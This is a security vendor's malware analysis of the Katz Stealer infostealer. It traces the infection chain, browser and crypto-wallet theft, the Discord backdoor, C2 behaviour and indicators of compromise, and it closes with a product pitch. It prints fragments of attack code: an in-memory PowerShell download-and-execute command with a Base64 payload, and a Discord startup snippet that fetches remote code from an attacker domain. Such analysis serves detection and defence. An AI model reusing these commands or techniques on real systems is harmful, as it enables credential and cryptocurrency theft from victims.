Katz Stealer is a newly discovered information-stealing malware-as-a-service (MaaS) that emerged in 2025. It combines aggressive credential theft, system fingerprinting, and stealthy persistence mechanisms with evasive loader behavior and in-memory execution. Distributed through phishing campaigns and fake software downloads, this threat is engineered for maximum stealth, modular payload delivery, and rapid data exfiltration.
This analysis examines Katz Stealer's infection chain, obfuscation techniques, credential theft mechanisms, command-and-control (C2) behavior, and persistence methods. We also share key indicators of compromise (IOCs), exact code samples, and insights to help security teams detect and defend against this threat more effectively.
Katz Stealer is designed to extract a wide array of sensitive information. Its stealing capabilities include the following.
Put simply, it collects nearly everything of value that resides on a compromised system.
Katz is sold through a malware-as-a-service (MaaS) model. Its web-based panel enables threat actors to generate customized builds, toggle evasion options, search logs, and export stolen data. The platform's ease of use and built-in evasion tools make it attractive even to low-skilled operators, driving its rapid spread.
Katz Stealer’s infection chain involves several stages from initial delivery to final payload execution. The entire process is designed to evade detection at each step:
The malware conceals code in an image file and leverages a UAC bypass (via cmstp.exe) and scheduled task creation for stealthy persistence.
The attack chain often begins with a malicious GZIP archive, typically delivered through phishing emails or disguised as cracked software downloads.
Within this archive lies a JavaScript dropper, intentionally obfuscated to evade detection and analysis.
Once extracted or executed, the JavaScript initiates the infection process. The code is highly obfuscated using deceptive variable names and convoluted JavaScript tricks. These include type coercion (e.g., +[], []+[]), misuse of special values like Infinity, and dynamic string reconstruction via array manipulation and implicit type casting.
An example of the obfuscation strategy involves assigning seemingly nonsensical variables using expressions like ([+Infinity[+1]])[index], which causes runtime errors unless deeply inspected or deobfuscated. Additionally, strings are built using polymorphic concatenation patterns, pulling characters from coerced string representations of arrays and objects, to obscure payload execution.
This technique not only thwarts static analysis but also significantly complicates reverse engineering, as each component of the payload is fragmented and encoded in non-linear, self-mutating expressions.
|
// Heavily obfuscated JavaScript binary |
After the victim executes the obfuscated JavaScript dropper, the script leverages WScript.Shell or a similar COM object to invoke PowerShell in a stealthy manner.
Specifically, it runs PowerShell with the following flags:
The JavaScript assigns a large Base64-encoded blob to a variable (e.g., $rhinorrhagia), representing the next-stage payload. Rather than writing this to disk, the script decodes and executes it in memory using [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(...)) piped into IEX (Invoke-Expression).
An example command line observed:
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -WindowStyle Hidden -Command "$rhinorrhagia = 'JABjAG8...'; IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($rhinorrhagia)))" |
When de-obfuscated, it looks like the following PowerShell script, which downloads what appears to be a harmless image file hosted on Archive.org. In reality, the script scans the image’s content for markers <<base64_start>> and <<base64_end>> and extracts a chunk of hidden code embedded within the image file. This hidden payload is base64-encoded and obfuscated, helping it blend in as normal image data to bypass antivirus detection.
The PowerShell loader then decodes the payload and invokes it via .NET Reflection, never writing the code to disk.
This means the next-stage malware runs directly in memory.
|
$rhinorrhagia = 'JABjAG8AbQBwAGwAbQBJAGEdAB1AGwAeAQgAD0BAlAAnACMeAAAjACAbwAjACeACaAvAHY/ZQBkAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQAyADAAMgA1ADAANAAxADMA...' |
The decoded payload is a .NET-based loader that prepares the system for the final stealer component. Before deploying the main payload, the .NET code performs several checks and setup actions:
It calls Windows APIs to get the system’s locale, keyboard layout, and default UI language, comparing them against a list of disallowed country/regional codes (primarily CIS countries).
If the host is in a blacklisted region, the malware terminates itself to avoid analysis or legal risk.
|
struct ptr_AvoidCountriesCIS |
Katz Stealer performs multiple checks to detect virtualized or sandboxed environments often used by malware analysts.
Katz Stealer escalates privileges without user prompt by exploiting a known UAC bypass technique using the Microsoft Connection Manager Profile Installer utility (cmstp.exe). The .NET loader includes code (in C#) that abuses cmstp.exe to execute with elevated rights (via a malicious INF file). This allows the malware to run subsequent steps as administrator. In the process, it may also add a Scheduled Task for persistence, ensuring the malware or its components restart on reboot with elevated privileges.
Figure 1. UAC Bypass Done by Katz InfoStealer Malware [1]
Armed with admin privileges, the loader downloads the final stealer payload from a cloud host (a temporary Cloudflare R2 domain). Instead of launching this payload directly, it allocates a hollow process for stealth—specifically, it spawns the legitimate MSBuild.exe (a Microsoft Visual Studio build tool) and injects the stealer payload into it via process hollowing.
By running inside MSBuild (a known signed binary), the malware hopes to blend in and bypass security tools. The target process (MSBuild.exe) is launched with elevated privileges (thanks to the UAC bypass), ensuring the stealer runs with full system permissions.
Once running inside the MSBuild process, the main Katz Stealer payload initiates its core behavior. It establishes a persistent connection to a command-and-control server and begins deploying additional modules for data theft:
The injected malware opens a TCP connection to a hardcoded C2 address (for example, 185.107.74[.]40). It identifies itself using a unique implant ID (e.g. the string "al3rbi") and enters a retry loop to continuously reconnect if the C2 goes down. This persistent beacon ensures the attackers maintain real-time control. The malware may also communicate with C2 over HTTPS for certain tasks, using a custom User-Agent string ("... Chrome/135.0.0.0 Safari/537.36 katz-ontop") to blend in with browser traffic while still being identifiable to defenders.
After check-in, the malware typically receives another payload from the C2. For instance, it downloads a file which it saves as received_dll.dll in the system’s Temp directory. This file is a further module (DLL) that will be injected into web browsers for credential stealing. Katz Stealer uses the existing elevated context to launch or attach to browser processes as needed (detailed below in the Data Theft section).
Throughout these stages, Katz Stealer ensures that very little is left on disk in the clear. Each step involves obfuscation or in-memory execution, from the gzip-compressed JavaScript to the image file steganography and .NET reflective loading. Any files that are written (like the temp DLLs or output text files with stolen data) use inconspicuous locations under user directories. By the time the malware is fully active, it is lurking within trusted processes (MSBuild.exe, and later web browsers and even Discord) with high privileges.
Web Browsers are a primary target of Katz Stealer, given the wealth of credentials and session tokens they store. The malware specifically targets Chromium-based browsers (Chrome, Edge, Brave, etc.) and Gecko-based browsers (Firefox, Waterfox, etc.), covering over 78 browser variants by some counts.
After initial compromise, the malware searches for installed browsers and takes the following approach:
Injecting into Browsers: The previously downloaded received_dll.dll is actually a browser injection module. Katz Stealer will launch the installed browser in headless mode (no visible UI) and then use Windows API (CreateRemoteThread) to inject this DLL into the browser’s process space. By operating inside the browser process, the malware can call internal browser functions and access data with the same privileges as the browser itself. This also helps it hide, since antivirus might see a browser process (e.g. chrome.exe) doing the data access rather than an unknown binary.
Modern Chromium browsers secure sensitive data (like cookies and passwords) with an additional encryption tied to the user’s login. Katz Stealer bypasses this Application-Bound Encryption (ABE) by replicating how the browser itself would decrypt the data.
Once inside the browser process, the malware:
The malware authors appear to have borrowed from or modified open-source tools to implement this password/cookie decryption. Security researchers noted the code was very similar to an open-source project (dubbed “ChromeKatz”) that demonstrates cracking Chrome’s encrypted data. By integrating this technique, Katz Stealer can dump credentials, saved passwords, cookies, and even credit card CVVs from browsers, even those with updated encryption protections.
For Firefox and other Gecko-based browsers, the malware uses a different approach (since Firefox stores data differently). Katz Stealer finds the Firefox profile directories (via the profiles.ini file) and directly grabs critical files:
Overall, by targeting both Chromium and Gecko browsers, Katz Stealer aims to maximize credential theft; including passwords, auto-fill data, web session tokens (cookies), and even credit card details saved in browsers.
The theft of session cookies and tokens is particularly dangerous because it can allow attackers to bypass login (and even MFA) by impersonating the victim’s web sessions.
One of Katz Stealer’s more novel features is how it compromises the Discord desktop application to establish persistence and ongoing control:
Discord is an Electron-based app (essentially a Chromium browser under the hood). Katz Stealer locates Discord’s installation directory and finds the app’s JavaScript bundle (app.asar archive). It then modifies the index.js file inside this archive to include malicious code that runs when Discord launches. Specifically, the malware injects a snippet like the following into Discord’s startup script:
|
require('https').request({ |
This code runs every time Discord starts up. What it does:
In effect, Discord becomes a backdoored application: every time it runs, it will fetch and execute attacker-supplied JavaScript. This gives the attackers a persistent foothold on the system without needing a separate process. Through this mechanism, attackers could push new malicious commands or code on the fly (for example, instruct Discord to search for files, exfiltrate data, or even download and launch other malware). Because Discord is a trusted, frequently-used app, this backdoor is stealthy – the user still sees Discord functioning normally, and security tools see a legitimate signed application generating network traffic to what might be seen as an API domain.
This clever persistence method leverages the trust and auto-start behavior of Discord. Many users have Discord launch at startup; with the malicious code embedded, it means the backdoor is re-established on every reboot when Discord auto-launches. Even if the main stealer process (in MSBuild) is killed or exits after stealing data, the attacker can regain access later via Discord’s connection. Notably, the use of twist2katz.com for delivering payloads to Discord was identified and flagged by threat intelligence as a key indicator.
Beyond browser credentials, Katz Stealer is aggressively targeting cryptocurrency assets. It recognizes that many users store wallet keys or use wallet software on their PCs, which can be extremely lucrative for attackers.
The malware covers both desktop wallet applications and browser-based wallets:
Katz Stealer scans the filesystem for known wallet application data directories, focusing on popular crypto wallets. Reports list targets including Exodus, Bitcoin Core, Litecoin, Dogecoin, Dash, Electrum, Ethereum, Coinomi, Daedalus, Monero, Wasabi, Ravencoin, among others. For each wallet found, the malware looks for wallet files and private keys. It uses file name patterns, extensions, and known folder paths to locate these. Once found, it copies wallet files and keys to a temporary directory under its control. In some cases, it may recursively copy entire wallet folders to be sure it captures all data. These files might include wallet databases, keyfiles, seed phrase backups, etc.
Recognizing that many crypto users rely on browser extensions (like MetaMask or other Web3 wallets), Katz Stealer is equipped with a list of 154 target browser extension IDs corresponding to crypto wallets. It searches the browser extension directories for those IDs. When found, it will gather any relevant files (which could include extension storage, encrypted vaults, or seeds). Particularly for the Brave Browser, which has a built-in cryptocurrency wallet, Katz Stealer knows how to retrieve Brave’s wallet data stored separately on disk.
After collecting crypto wallet data (whether desktop or extension-based), the malware ensures these files are staged for exfiltration. Given the sensitive nature of private keys and seeds, if the attackers successfully upload this data, they can immediately steal any cryptocurrency associated with those wallets. As a final step, Katz Stealer cleans up after itself in this phase: it deletes the temporary folders where it aggregated the wallet files, to erase traces and hinder forensic recovery.
Katz Stealer employs persistent command-and-control to orchestrate its activities and exfiltrate stolen data:
After initial infection, the malware maintains communication with its C2 servers. The primary C2 identified is an IP address (e.g. 185.107.74[.]40) listening on a presumably constant port. The malware’s implant ID (“al3rbi” in one sample) and constant re-connect attempts suggest a custom protocol over TCP. This could be a simple plaintext protocol or something like an encrypted binary stream.
Additionally, certain functions (like the Discord backdoor code) use HTTPS requests to attacker-controlled domains (such as twist2katz[.]com) for retrieving code. These domains and IPs are unique enough to serve as IOCs (Indicators of Compromise) for network defenders.
When using HTTP/HTTPS, Katz Stealer sets a custom User-Agent string that mimics a browser.
One observed User-Agent is:
|
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 katz-ontop |
The string is nearly identical to a legitimate Chrome browser agent, with the addition of katz-ontop at the end.
This could be an intentional marker for the malware’s traffic (to evade or confuse defensive parsers, or simply as a quasi-signature). Network monitoring tools can use this unique substring to flag potential Katz Stealer activity. Notably, one of the Sigma network rules released for Katz Stealer specifically looks for User-Agent strings containing “katz-ontop” in HTTP traffic.
All the data that Katz Stealer collects
is packaged and sent to the attackers via the C2 channel.
According to research, exfiltration is immediate: as soon as data is collected and ready, it’s uploaded to the remote server, rather than stored long-term on the victim’s disk. This reduces the footprint on the victim machine and ensures the attackers quickly get the loot (even if the infection is discovered and remediated shortly after, the data might already be in the attacker's hands). The use of a persistent TCP connection suggests data might be streamed or transferred on the fly. In other cases, the malware may use HTTPS POST requests to upload stolen files (the exact method can vary).
Through its C2, attackers can likely send commands or additional payloads. As seen, the malware downloads additional modules like browser DLLs and executes backdoor code via Discord. The presence of a continuous C2 channel means the operators can update the malware, fetch new instructions, or pivot to other actions (for example, downloading ransomware as a next stage, though none has been explicitly reported for Katz Stealer as of 2025). The C2 panel associated with the MaaS offers features like batch searching stolen data and exporting logs, implying that all exfiltrated data is stored in a database on the backend for attacker use.
After successful exfiltration, Katz Stealer attempts to cover its tracks. It deletes the temporary working directories it created (where it may have briefly stored files like wallet data or decrypted keys). This makes on-disk forensics more difficult. The main binary and modules, having been injected into processes, exist primarily in memory; when those processes terminate, the malware code vanishes. Only the modified Discord file and any leftover registry changes or scheduled tasks might betray the infection once the process is not running.
In essence, Katz Stealer’s C2 behavior is geared towards stealthy, continuous control and fast data theft. Any unusual outbound connection to the known IPs/domains or the presence of the katz-ontop user-agent should be treated as high-severity alerts in an organization’s network traffic.
Katz Stealer uses techniques like browser credential theft, Discord client injection, PowerShell-based loaders, and encrypted C2 communications. To stay protected, it’s essential to validate whether your security controls can detect and prevent these behaviors.
The Picus Security Validation Platform helps by safely simulating Katz Stealer’s techniques, such as password and cookie theft, DLL injection, and script-based persistence, using its continuously updated Threat Library. These simulations uncover blind spots across EDRs, NGFWs, and SIEMs before attackers can exploit them.
The Picus Threat Library includes the Katz Stealer threat, replicating real-world TTPs to support continuous security control validation.
|
Threat ID |
Threat Name |
Attack Module |
|
73515 |
Katz Infostealer Download Threat |
Network Infiltration |
|
99287 |
Katz Infostealer Email Threat |
Email Infiltration |
|
96554 |
Katz Loader Download Threat |
Network Infiltration |
|
83764 |
Katz Loader Email Threat |
Email Infiltration |
Security teams should monitor for the following IOCs associated with Katz Stealer activity, as compiled from 2025 reports.
Mozilla/5.0 ...(KHTML, like Gecko)... Safari/537.36 **katz-ontop** – any occurrence of katz-ontop in an HTTP User-Agent string is a strong indicator of this malware’s network traffic.
Reference
[1] “Katz Stealer Threat Analysis.” Available: https://www.nextron-systems.com/wp-content/uploads/2025/05/dnSpy_UAC_bypass.png.